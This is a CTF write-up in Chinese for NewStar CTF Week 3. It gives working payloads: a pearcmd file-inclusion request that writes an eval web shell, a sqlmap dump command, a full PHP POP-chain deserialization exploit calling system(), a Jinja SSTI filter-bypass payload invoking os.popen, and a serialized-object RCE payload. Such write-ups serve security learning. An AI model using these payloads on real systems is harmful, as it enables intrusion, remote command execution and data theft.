NewStar CTF WEEK3

Include 🍐

pearcmd 文件包含：前提是 `register_argc_argv` 打开，此时 pearcmd.php 会把 QUERY_STRING 按 `+` 切成 argv，于是可以用 `config-create` 子命令把含有 `<?=eval($_POST[1]);?>` 的内容写进 `/tmp/chuling2.php`。要用 Burp 直接发原始请求，避免浏览器把 `+`、`<`、`?` 等字符 URL 编码掉；从后面 `?file=/tmp/chuling2` 不带后缀就能包含来看，后端应该是在 file 参数后面拼了 `.php`。

?+config-create+/&file=/../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/tmp/chuling2.php

最终exp

GET:
?file=/tmp/chuling2
POST:
1=phpinfo();

之后 POST `1=system('ls /');` 这类 PHP 语句即可任意命令执行。注意写入的 shell 是 `eval($_POST[1])`，所以 POST 的是 PHP 代码而不是裸的 shell 命令。

medium_sql

sqlmap 一把梭，时间盲注（`-p id` 限定注入参数，`--batch` 跳过所有交互；若要强制只走时间盲注可再加 `--technique=T`）：

python sqlmap.py -u url/?id= -p id -D ctf -T here_is_flag -C flag --dump --batch

POP Gadget

简单的 pop 链，顺着魔术方法一路串下去：`Begin::__destruct` → `preg_match()` 把 `$name` 强转成字符串 → `Then::__toString` → `($this->func)()` → `Super::__invoke` → `$this->obj->getStr()`（Handle 没有这个方法）→ `Handle::__call` → `$this->obj->end()` → `CTF::end` → `unset($this->handle->log)` → `WhiteGod::__unset` → `($this->func)($this->var)` 即 `system('cat /flag')`。注意 `Super::end()` 会 `die`，所以 `Handle->obj` 必须是 `CTF` 而不能是 `Super`。

<?php
// Challenge source is echoed back to every visitor, so the gadget classes
// below are fully known to the attacker — presumably the endpoint later
// unserialize()s attacker-controlled data (the sink itself is not shown here).
highlight_file(__FILE__);

class Begin{
    /** Entry gadget: whatever is stored here is coerced to a string by preg_match(). */
    public $name;

    /**
     * Runs automatically when the object is destroyed (e.g. at the end of the
     * request that unserialize()d it). The file has no strict_types, so passing
     * an object to preg_match()'s string parameter converts it via __toString(),
     * which is what lets a Then object placed in $name start the chain.
     */
    public function __destruct()
    {
        $greeting = preg_match("/[a-zA-Z0-9]/", $this->name)
            ? "Hello"
            : "Welcome to NewStarCTF 2023!";
        echo $greeting;
    }
}

class Then{
    /** Callable (or invokable object) fired whenever this object is cast to string. */
    public $func;

    /**
     * String-conversion trap. Calling the stored value as a function means an
     * object with __invoke() (Super in the chain) gets executed here; the
     * returned text is irrelevant to the chain.
     */
    public function __toString()
    {
        $callable = $this->func;
        $callable();
        return "Good Job!";
    }

}

class Handle{
    /** Object whose end() is reached through the __call() trap. */
    public $obj;

    /**
     * Catch-all for undefined method names: any unknown call (getStr() in the
     * chain) is redirected to $obj->end(). The original name and arguments
     * are ignored.
     */
    public function __call($func, $vars)
    {
        echo "call";
        $target = $this->obj;
        $target->end();
    }

}

class Super{
    /** Object that receives the getStr() call; Handle has no such method, so its __call() fires. */
    public $obj;

    /**
     * Fires when the object is used as a function (original note: "字母数字()",
     * i.e. triggered by a plain call such as ($this->func)()).
     */
    public function __invoke()
    {
        echo "invoke";
        $next = $this->obj;
        $next->getStr();
    }

    /**
     * Dead end: terminates the script. Because Handle::__call() invokes
     * $obj->end(), Handle->obj must be a CTF, not a Super, or the chain stops here.
     */
    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    /** Object on which an undefined property is unset, triggering its __unset(). */
    public $handle;

    /**
     * Reached from Handle::__call(). Unsetting a property that WhiteGod does not
     * declare (log) routes into WhiteGod::__unset().
     */
    public function end()
    {
        echo "end";
        $h = $this->handle;
        unset($h->log);
    }

}

class WhiteGod{
    /** Callable name/value, e.g. 'system'. */
    public $func;
    /** Single argument handed to $func, e.g. the shell command. */
    public $var;

    /**
     * Sink of the chain. Note the parameter $var (the property name being
     * unset) is ignored; it is the property $this->var that is passed to $func.
     */
    public function __unset($var)
    {
        $fn = $this->func;
        $fn($this->var);
    }
}

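// --- exp: build the gadget chain and print the serialized payload ---
// Chain (every link is a public property, so it serializes cleanly):
//   Begin::__destruct -> preg_match() coerces $name (a Then) to string
//   -> Then::__toString -> ($func)() -> Super::__invoke
//   -> $obj->getStr() on Handle (undefined) -> Handle::__call
//   -> $obj->end() on CTF -> CTF::end -> unset($handle->log)
//   -> WhiteGod::__unset -> ($func)($var) == system($cmd)
// Handle->obj must be a CTF, not a Super: Super::end() die()s.
$cmd = 'cat /flag';

$a = new Begin();
$a->name = new Then();
$a->name->func = new Super();
$a->name->func->obj = new Handle();
$a->name->func->obj->obj = new CTF();
$a->name->func->obj->obj->handle = new WhiteGod();
$a->name->func->obj->obj->handle->func = 'system';
$a->name->func->obj->obj->handle->var = $cmd;

$payload = urlencode(serialize($a));
echo $payload, PHP_EOL;

// Disarm the chain on the machine generating the payload: Begin::__destruct
// runs at script shutdown and would otherwise walk the whole chain and run
// system($cmd) locally. With a plain string in $name the destructor only
// echoes "Hello" after the payload line.
$a->name = 'disarmed';

// Recorded output of an earlier run. NOTE: it was produced with var='ls /'
// (s:4:"ls /"), not 'cat /flag' — regenerate for the current $cmd.
//O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22var%22%3Bs%3A4%3A%22ls+%2F%22%3B%7D%7D%7D%7D%7D%7D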

GenShin

过滤了 `{{`，改用 `{% print(...) %}` 语句块来输出；同时用 `attr()` 代替 `.`/`[]` 取属性，并把 `__class__`、`__init__`、`__globals__`、`os`、`popen` 这类关键字拆成 `"_""_cla""ss_""_"` 这种相邻字符串拼接来绕过关键字过滤。这里是直接套用之前某次 ssti 的 exp getshell 的：

{%print(config|attr("_""_cla""ss_""_")|attr("_""_in""it_""_")|attr("_""_glo""bals_""_")|attr("_""_get""item_""_")("o""s")|attr("po""pen")("ls")|attr("re""ad")())%}

R!!!C!!!E!!!

应该也可以盲注；这里直接构造嵌套的 `minipop` 对象生成序列化 payload。`code` 里的 `| script result1` 把命令输出落到文件 `result1`，推测是因为命令结果不会直接回显（具体的执行点在题目源码里，这里没有贴出）：

<?php
// Source disclosure is part of the challenge: the minipop class is shown so
// the serialized payload can be built offline with the exact property layout.
highlight_file(__FILE__);
class minipop{
    // Shell command carried in the serialized object. The "| script result1"
    // tail writes the command's output to a file named result1 — presumably
    // because the execution point gives no direct echo (not visible here).
    public $code="cat /flag_is_h3eeere|script result1";
    // Nested minipop is stored here by the exp below; the consuming code is not
    // shown, so why a second level is needed cannot be confirmed from this page.
    public $qwejaskdjnlka;
}


// Two-level minipop: the inner object rides in $qwejaskdjnlka of the outer one.
// Both keep the default $code, so the serialized string is emitted as-is for
// the challenge endpoint to consume.
$inner = new minipop();
$outer = new minipop();
$outer->qwejaskdjnlka = $inner;
echo serialize($outer);
?>

OtenkiGirl

猜测是原型链污染（prototype pollution），还在学习中。